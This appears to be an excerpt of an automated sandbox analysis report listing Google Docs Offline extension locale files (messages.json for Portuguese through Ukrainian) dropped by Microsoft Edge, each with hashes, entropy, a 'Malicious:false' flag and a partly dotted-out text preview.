                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\pt_PT\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):914
                                                                                                                                                                                                                                                                Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                                MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                                SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                                SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                                SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\ro\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):937
                                                                                                                                                                                                                                                                Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                                MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                                SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                                SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                                SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\ru\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1337
                                                                                                                                                                                                                                                                Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                                SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\si\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2846
                                                                                                                                                                                                                                                                Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\sk\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):934
                                                                                                                                                                                                                                                                Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                                MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                                                                SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                                SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                                SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\sl\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):963
                                                                                                                                                                                                                                                                Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                                MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                                SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                                SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                                SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\sr\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1320
                                                                                                                                                                                                                                                                Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                                MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                                SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                                                                SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                                                                SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\sv\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):884
                                                                                                                                                                                                                                                                Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                                                                MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                                                                SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                                                                SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                                                                SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\sw\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):980
                                                                                                                                                                                                                                                                Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                                                                                MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                                                                                SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                                                                                SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                                                                                SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\ta\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1941
                                                                                                                                                                                                                                                                Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                                                                                                MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                                                                                                SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                                                                                                SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                                                                                                SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\te\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1969
                                                                                                                                                                                                                                                                Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                                                                MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                                                                SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                                                                                SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                                                                                                                SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\th\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1674
                                                                                                                                                                                                                                                                Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                                                                                                MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                                                                                SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                                                                                SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                                                                                SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\tr\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1063
                                                                                                                                                                                                                                                                Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                                                                                                MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                                                                                                SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                                                                                                                SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                                                                                                SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\uk\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1333
                                                                                                                                                                                                                                                                Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                                                                                                                MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                                                                                                SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                                                                                                                SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                                                                                                SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\ur\messages.json

                                                                                                                                                                                                                                                                Download File
